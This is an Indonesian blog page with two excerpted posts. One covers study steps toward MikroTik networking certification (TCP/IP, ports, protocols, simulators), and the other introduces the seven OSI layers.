Inilah tahap yang mungkin sulit daripada tahap sebelumnya. Di tahap TCP/IP Fundamental ini anda paling tidak mengerti Port yang sering digunakan dalam dunia jaringan. Anda juga harus mengerti protokol-protokol yang biasa digunakan dalam jaringan, seperti: ICMP,TCP, dan UDP. Jika anda paham tentang 7 OSI Layer maka anda akan mengerti alur paket data yang dikirim dari Physical Layer sampai bisa dilihat oleh  and user (konsumen).
Belajar OSI Layer : http://luxsmart.blogspot.com/2015/07/pengertian-dan-penjelasan-7-jenis-osi.html

5. Simulasi Menggunakan Aplikasi Simulator
Setelah ke-empat tahap sudah dikuasai. Anda harus mempraktikan melalui aplikasi simulator. Misalnya: GNS3, Cisco Packet Tracer, dll.

Terakhir, hanya perlu mencoba dan terus mencoba, bertanya, sharing dan mengembangkan dengan teman satu tujuan, guru IT, dan orang yang lebih menguasai tentang alat tersebut.

Untuk melanjutkan supaya MikroTik Expert anda bisa belajar serta Sertifikasi MikroTik ditempat Training MikroTik. Anda juga bisa belajar dan sertifikasi kepada Trainer yang sudah mempunyai title Academy Trainer MikroTik. "Tidak menutup kemungkinan anda akan menjadi Academy Trainer atau bahkan bisa jadi Trainer".
Status: MTCNA

Sumber : Buku MikroTik Kung Fu : Kitab I
Read more

Senin, 06 Juli 2015

Pengertian dan Penjelasan 7 Jenis OSI Layer

Pengertian
Open System Interconnection (OSI) merupakan model arsitektur jaringan yang dikembangkan oleh International Organization for Standarization (ISO) bisa juga diartikan "Kerangka logika terstruktur bagaimana proses komunikasi data berinteraksi melalui jaringan.
Lapisan OSI jumlahnya ada 7, yaitu:
Application, Presentation, Session, Transport, Network, Data Link, dan Physical.

Ke tujuh OSI tersebut dibagi lagi menjadi 2 grup, yaitu: Upper Layer dan Lower Layer.
  • Upper Layer menangani bagaimana data dipresentasikan. 
  • Lower Layer yang jadi intisari bagaimana data dialirkan dari fisik (bit), frame, Network, Protocol hingga dipresentasikan oleh Upper Layer.
Grub Upper Layer: Application, Presentation, dan Session.
Grub Lower Layer:  Transport, Network, Data Link, dan Physical.

Nah, kita sebagai Networker rata-rata fokus pada Lower Layer.

Penjelasan 7 OSI Layer:
7 - Application Layer
6 - Presentation Layer
5 - Session Layer
4 - Transport Layer
3 - Network Layer
2 - Data Link Layer
1 - Physical Layer
Read more